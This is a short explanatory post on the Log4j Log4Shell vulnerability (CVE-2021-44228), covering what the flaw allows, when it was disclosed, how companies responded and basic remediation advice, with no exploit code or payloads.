Log4j is a logging tool that is a part of the Apache Logging Services and one of several Java logging frameworks. It is based off of the Java programming language and is present in millions of applications and services. Log4Shell is the name of the vulnerability that was found with Log4j.
About Log4J and the Log4Shell Vulnerability
The vulnerability, known as CVE-2021-44228 or Log4Shell vulnerability allows an attacker to inject a special string into the logging server. This gives it the ability to execute code and install software that can be used for remote access. Then an attacker can deploy ransomware and perform other malicious activities. The vulnerability was first discovered on Minecraft servers. Attackers were posting special strings in chat that would allow them to exploit those systems.
When Was the Log4Shell Vulnerability Discovered?
The discovery may have happened as early as December 2nd and was published on December 9th, 2021. Many are saying that this could be the worst vulnerability in the past decade. It’s so bad due to its broad deployment across millions of applications. Apple, Amazon, Cloudflare, and many other companies have released statements about their use and remediation of Log4j.
As a preventative measure, the city of Quebec had shut down roughly 4,000 of its websites. This was to determine the impact of the Log4Shell vulnerability. It has also been reported that Log4Shell has the capability to exfiltrate AWS secrets.
Attackers are currently using Botnets to scan the internet looking for indications of Log4j so that it can be exploited.
As a remediation goes, organizations are urged to look for Log4j and patch it with release 2.15.0. Organizations are encouraged to implement an EDR solution and look for malicious activity. This may be a challenge for many organizations. It may not be immediately clear how many applications use Log4j.
For more details visit the following pages:
GitHub – authomize/log4j-log4shell-affected: Lists of affected components and affected apps/vendors by CVE-2021-44228 (aka Log4shell or Log4j RCE). This list is meant as a resource for security responders to be able to find and address the vulnerability